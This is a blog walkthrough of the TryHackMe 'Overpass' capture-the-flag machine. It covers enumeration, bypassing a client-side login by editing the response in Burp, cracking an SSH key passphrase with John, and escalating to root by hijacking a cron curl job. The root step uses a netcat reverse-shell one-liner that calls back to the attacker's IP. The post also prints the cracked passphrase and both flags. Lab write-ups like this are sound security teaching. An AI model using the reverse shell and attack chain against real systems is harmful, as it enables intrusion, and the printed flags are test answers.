Vuk Markovic - Blog: TryHackMe - Overpass


Overpass Walk-through By V

Enumeration:

First, we are going to run nmap. The command we are going to use (with IP standing for the target address) is:

nmap -A -T4 -sV IP -p-

The open ports we get back are:

  • 80 HTTP
  • 22 SSH

Nikto:

Now we can use the nikto -h IP command to get more information about the web server and to see whether there is anything we can use to our advantage.

We got the following interesting results from nikto:

  • /admin/
  • /downloads/

Another thing we can do is check the actual client-side code by typing view-source:http://IP/login.js into the URL bar. At the bottom we can see the function:

async function login() { ... }, which contains the piece of code that will let us bypass the login form.

The creds variable holds the entered credentials, and the response variable sends them to /api/login for validation. The statusOrCookie variable then takes the response body.

At the end there is a conditional statement that checks for "Incorrect Credentials", and at first glance it all seems fine. However, for any other response it sets the "SessionToken" cookie to statusOrCookie and redirects us to the admin panel.
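To make the flaw concrete, here is an added Node.js model of the login decision described above, beside a hardened variant. This is example code written for this post, not the box's real login.js; the names (USERS, serverLogin, vulnerableClientLogin, hardenedAdmin and so on) and the sample credentials are assumptions of the example. The flawed design lets the client decide it is logged in from the response body, and lets the admin page accept any cookie that merely exists; the hardened design keeps the server as the only authority over what counts as a session.

```javascript
// Added example, not the box's real login.js: a Node model of the client-side
// login decision described in the post, beside a hardened variant. All names
// and the sample credentials are this example's own.

// Constructed sample user store (a password chosen for the demo only).
const USERS = { james: "constructed-demo-password" };

// Server as the walkthrough implies: /api/login answers 200 either way and
// puts either the error string or the new session token in the body.
function serverLogin(creds, sessions) {
  if (USERS[creds.username] !== creds.password) {
    return { status: 200, body: "Incorrect Credentials", setCookie: null };
  }
  const token = "tok-" + (sessions.size + 1); // constructed, not a secure token
  sessions.add(token);
  return { status: 200, body: token, setCookie: null };
}

// Flawed client: the only check is a string compare on the body, so ANY other
// body (including an empty one after the text is removed in a proxy) becomes
// the SessionToken cookie.
function vulnerableClientLogin(response) {
  if (response.body === "Incorrect Credentials") {
    return { loggedIn: false, cookie: null };
  }
  return { loggedIn: true, cookie: { SessionToken: response.body } };
}

// Flawed admin page: grants access if a SessionToken cookie merely exists.
function vulnerableAdmin(cookie) {
  return cookie !== null && cookie !== undefined && "SessionToken" in cookie;
}

// Hardened server: failure is a 401 with no token; success sets the cookie
// itself (HttpOnly, so page scripts never handle the token as data).
function hardenedServerLogin(creds, sessions) {
  if (USERS[creds.username] !== creds.password) {
    return { status: 401, body: "Incorrect Credentials", setCookie: null };
  }
  const token = "tok-" + (sessions.size + 1);
  sessions.add(token);
  return { status: 200, body: "ok", setCookie: { SessionToken: token, httpOnly: true } };
}

// Hardened client: branches on the status only and never turns the body into
// a credential; the browser applies whatever Set-Cookie the server sent.
function hardenedClientLogin(response) {
  return { loggedIn: response.status === 200 };
}

// Hardened admin page: the cookie must carry a token the server actually issued.
function hardenedAdmin(cookie, sessions) {
  return cookie !== null && cookie !== undefined && sessions.has(cookie.SessionToken);
}

// Replays the tampering described in the post against both designs.
function demo() {
  // An honest failed login is rejected by both designs.
  const honest = vulnerableClientLogin(serverLogin({ username: "james", password: "wrong" }, new Set()));

  // Response with the error text deleted in a proxy: 200 with an empty body.
  const tampered = { status: 200, body: "", setCookie: null };
  const flawed = vulnerableClientLogin(tampered);
  const flawedAdminGranted = vulnerableAdmin(flawed.cookie);

  const sessions = new Set();
  // The hardened client may still "think" it is logged in, but no cookie was
  // set by the server, and a forged cookie is not in the session store.
  const hardenedClientThinks = hardenedClientLogin(tampered).loggedIn;
  const hardenedAdminGranted =
    hardenedAdmin(tampered.setCookie, sessions) || hardenedAdmin({ SessionToken: "forged" }, sessions);
  // A real login still works end to end.
  const real = hardenedServerLogin({ username: "james", password: USERS.james }, sessions);
  const hardenedRealGranted = hardenedAdmin(real.setCookie, sessions);

  return { honestLoggedIn: honest.loggedIn, flawedAdminGranted, hardenedClientThinks, hardenedAdminGranted, hardenedRealGranted };
}

console.log(demo());
```

Running the block prints that the flawed admin page grants access with an empty SessionToken while the hardened one only grants access to a token it issued itself; the fix is that the server, not the page script, decides what a session is and validates it on every admin request.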

Burpsuite:

Let's start BurpSuite, go to the Proxy tab and open the browser within it. From there, browse to the target IP in the Burp browser, type any credentials into the admin panel login form and turn intercept on. Then click login and the request will show up in your BurpSuite session.

Now, let's modify the response:

Click the "Action" button --> Do intercept --> Response to this request --> then click the "Forward" button.

Since the response we get contains "Incorrect Credentials", just delete "Incorrect Credentials" from the response body in BurpSuite and turn intercept off.

Once we go back to the Burp browser, you will see a key.

You will also see that we got a user, James, which will come in handy when we start brute-forcing, so document the user.

John The Ripper:

Copy the key and paste it into a text document on your machine. Use the following steps:

  • mousepad
  • Paste the key
  • CTRL + S to save the document
  • Save it with .key extension

Now, we are going to use John the Ripper to crack the password protecting James's key. Assuming you saved the key as james.key:

python /usr/share/john/ssh2john.py james.key > james.hash

With the command above we created a hash from the key that we got. Now, let's crack the password (john takes the wordlist as an option, not as a second positional file):

john --wordlist=/usr/share/wordlists/rockyou.txt james.hash

After that we get the password: john13

SSH Login:

Let's login to James user via SSH:

chmod 600 james.key
ssh -i james.key james@IP

(james.key being the key file you saved; ssh refuses a private key that is readable by others, which is what the chmod fixes.) When prompted for the key's passphrase, enter: john13

Now that we are on the target machine, let's run pwd to see where we are. Then run ls to list the contents of the directory, and there we will see user.txt, which is our first flag.

cat user.txt

flag: thm{65c1aaf000506e56996822c6281e6bf7}

Reverse Shell - Privilege Escalation:

For our second flag we need to gain root access. So let's change directory to /etc with cd /etc and, again, list the contents of this directory with the ll command (an alias for ls -l on this box).

Find a crontab and let's cat the content with a command:

cat crontab

At the bottom you will see a job that runs as root, and the command it uses is curl.

Now, let's go to the hosts file, so type: nano hosts and inside that file change the IP next to overpass.thm to your IP. Save the file with CTRL+O and press Enter. This makes the target fetch from our machine when the cron job runs, which is how we get it to execute a reverse shell script.

Use CTRL+X to exit the file. Next, let's go back to our machine, open a new tab in the terminal and create the following folders, which need to be in exactly this order, so follow along:

  • mkdir downloads
  • cd downloads
  • mkdir src
  • cd src
  • touch buildscript.sh
  • mousepad buildscript.sh

Go to https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and paste rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 1234 >/tmp/f into buildscript.sh, replacing YOUR_IP with your IP. Press CTRL+S and close mousepad.

Next, we are going to go back up out of those folders with cd, to the directory that contains the downloads folder, and from there we are going to run:

python3 -m http.server 80

Then, open a new tab and run netcat with a command:

nc -lvnp 1234

Wait in the netcat tab for the target system to connect. Once we are in, we can run whoami and see that we are root.

Let's run ls; root.txt should be in the list of contents.

cat root.txt

flag: thm{7f336f8c359dbac18d54fdd64ea753bb}